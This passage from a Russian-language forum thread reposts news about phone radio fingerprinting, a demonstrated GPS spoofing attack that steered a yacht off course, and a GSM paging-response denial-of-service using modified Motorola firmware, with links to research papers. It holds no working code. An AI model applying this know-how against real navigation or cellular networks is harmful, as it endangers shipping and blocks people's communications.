    Метод базируется на погрешностях процесса производства, создающего вариации (различные ошибки и отклонения) в электронике каждого мобильного устройства. Исследователь Якоб Хассе (Jakob Hasse) отметил в беседе с журналом New Scientist, что радиооборудование в сотовых телефонах состоит из целого ряда компонентов вроде усилителей мощности сигнала, излучателей, смесителей сигналов, причём все они могут влиять на неточность конечного сигнала после цифро-аналогового преобразования.
    Весьма важно и то, что упомянутый метод слежения функционирует, по словам разработчиков, целиком в пассивном режиме — регистрирующее устройство ничего не излучает, а лишь принимает и анализирует передаваемые мобильными аппаратами радиоизлучения. Другими словами, обнаружить этот тип наблюдения невозможно.
    До настоящего времени исследователи проверяли работу технологии только на смартфонах 2G (GMS), однако господин Хассе подчёркивает, что всё вышесказанное точно также относится и к мобильным устройствам, работающим в сетях 3G и 4G — производственные дефекты никуда не исчезают, и влияют на характер излучения, создавая, по сути, «опечатки пальцев» для каждого смартфона.
    Каждый телефон состоит из массы компонентов, минимальные отклонения и отличия в которых создают уникальные характеристики сигнала
    Отмечается, что метод технически весьма требователен к ресурсам, но он может оказаться полезен в ряде случаев при судебных расследованиях и в деятельности правоохранительных органов — сотовые телефоны можно будет отслеживать не только по SIM-картам, идентификаторам мобильного оборудования IMEI или другим характеристикам, которые могут изменяться или подделываться. Особенно, если точность метода будет доведена или максимально приближена к 100%.
    с уважением

  19. #159
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    КАК УГНАТЬ МИЛЛИОН: ВЗЛОМ ПО GPS
    Недавно у побережья Италии была угнана роскошная, ультрасовременная яхта. В полицию никто не обращался: угон стал результатом заранее согласованных испытаний, проведенных командой американских технологов. За несколько лет работы они создали систему, позволяющую подделать сигналы системы GPS.

    В системе глобальной навигации GPS используются сигналы, приходящие со спутников, работающих на орбитах высотой порядка 20 тыс. км. Навигатор самым точным образом фиксирует время прохождения сигнала от каждого из доступных спутников и вычисляет расстояние до них, что позволяет установить и собственное положение в пространстве с точностью до нескольких метров. Чтобы вмешаться в работу этой системы, авторы решили создать ложные сигналы, которые заставляли бы ее вычислять неверное положение и направление движения.

    Для работы GPS-навигатору требуется получать сигналы минимум с четырех спутников, каждый дополнительный позволяет лишь делать более точные вычисления. В открытом море видимость спутников выше, чем на суше, и число их доходит до десяти. Это, разумеется, усложняет задачу по обману системы. Если «подменить» сигнал лишь одного спутника, система просто отбросит его, как случайную ошибку. Если противоречить остальным будут сигналы целой группы спутников, она воспримет это как атаку. Поэтому авторам пришлось имитировать сигналы всей группировки GPS.

    На верхней палубе яхты было установлено устройство, создающее ложные сигналы для каждого из спутников GPS, более мощные, чем его собственные. Убедившись в том, что система «проглотила» эти сигналы, ученые стали менять их, «убеждая» компьютеры яхты в том, что она сбилась с курса (хотя в реальности она двигалась в точности как необходимо). Компьютер автоматически корректировал курс, уводя яхту туда, куда в итоге хотели «угонщики». В принципе, и команда могла не заметить происходящего: на информационных экранах обманутая система показывала совершенно прямую траекторию движения.

    Несмотря на то что в этот раз система, создающая ложный сигнал, была размещена на самой яхте, разработчики ее уверяют, что того же можно добиться и с дистанции в несколько километров. Потратив на ее создание несколько лет, авторы замечают, что «если эта схема просочится наружу, она может стать серьезной проблемой для мировых морских перевозок».

    По публикации Computerworld
    http://www.computerworld.com/s/artic...d_yacht_astray

    Добавлено: 07.08.13
    с уважением

  20. #160
    Эксперт из команды форума
    Регистрация
    04.03.2007
    Адрес
    Санкт-Петербург
    Сообщений
    9,441
    Записей в дневнике
    430

    По умолчанию 0

    Такой изящный способ нарушить работу сети GSM, в частности, систем безопасности при помощи простого доступного в изготовлении оборудования, это не глушилка, а более изящный способ:

    Журнал Хакер


    Взломанные мобильники серии Motorola C1 способны нарушить работу сотовой сети

    Исследователи из Технического университета Берлина на хакерской конференции Usenix Security Symposium продемонстрировали новый способ атаки на мобильные сети GSM. Атака предусматривает подделку ответов пэйджинга (paging response attack) с мобильного телефона.

    Пэйджинг — это один из этапов маршрутизации вызова в сотовой сети. Он включает в себя отправку широковещательного сообщения (paging request) на всю территорию трансляции сотовой станции с указанием уникального номера (TMSI) вызываемого аппарата. Мобильный телефон, в свою очередь, постоянно прослушивает канал, а когда заметит свой TMSI, то отвечает сообщением для установки канала связи. В крупном городе вроде Берлина количество таких широковещательных запросов в сети крупного оператора сотовой связи достигает 1200 в минуту.

    В нормальных условиях только один аппарат отвечает сообщением для установки канала связи, но немецким хакерам удалось модифицировать прошивку Motorola таким образом, что телефон пытается ответить на все вызовы paging request, нарушая нормальную работу сотовой сети.

    На видео (block phone calls or SMS via GSM paging procedure race condition) показан старый телефон Motorola, с которого осуществляется атака. После активации новой версии прошивки этот телефон способен эффективно блокировать звонки и SMS на другие телефонные аппараты в зоне действия данной базовой станции GSM.

    Подробнее см. слайды доклада (https://www.usenix.org/conference/us...lular-networks) и статью с техническим описанием (pdf) (https://www.usenix.org/system/files/...aper_golde.pdf).

    Осуществить этот взлом удалось благодаря тому, что несколько лет назад в открытый доступ просочилась техническая документация на процессор Vitelcom TSM30, так что исследователям удалось изучить, как реализован GSM-стек и внести необходимые изменения (http://www.sec.t-labs.tu-berlin.de/~...1aa9c8abb.diff). Берлинские хакеры создали новую версию прошивки для телефонов серии Motorola C1 (например, C118, C119, C123).

    Один телефон способен отвечать примерно на 1 запрос в секунду. По оценке авторов, всего 11-ти взломанных аппаратов достаточно, чтобы блокировать сотовую связь в сети мелкого оператора в городе вроде Берлина (660 запросов в минуту). Благодаря сделанным модификациям, телефоны с самодельной прошивкой OsmocomBB отвечают на запросы базовой станции быстрее всех. На графике показана скорость ответа на запросы аппаратов разных производителей с разными чипсетами BB.
    с уважением

Закрытая тема

Похожие темы

  1. Локспикеры..или спаммеры...
    от Клуб Любителей замков в разделе СТАЛЬНЫЕ ДВЕРИ И ЗАМКИ
    Ответов: 1
    Последнее сообщение: 16.04.2008, 03:47
  2. Котович и компания совсем заврались со своей дверь К80..
    от Клуб Любителей замков в разделе Мусорная корзина, доска позора, черные списки.
    Ответов: 7
    Последнее сообщение: 22.11.2007, 18:19
  3. Два в одном ...локспикеры учитесь.
    от Клуб Любителей замков в разделе СТАЛЬНЫЕ ДВЕРИ И ЗАМКИ
    Ответов: 43
    Последнее сообщение: 03.10.2007, 21:17
  4. Предостережение! Компания Esta и г-жа Кирьязова. Крик души...
    от artem_u в разделе СТАЛЬНЫЕ ДВЕРИ И ЗАМКИ
    Ответов: 3
    Последнее сообщение: 20.11.2006, 14:39
  5. Ещё одна выявленая ужасная опасность.
    от Клуб Любителей замков в разделе СТАЛЬНЫЕ ДВЕРИ И ЗАМКИ
    Ответов: 0
    Последнее сообщение: 07.11.2005, 19:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Яндекс цитирования Яндекс.Метрика

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17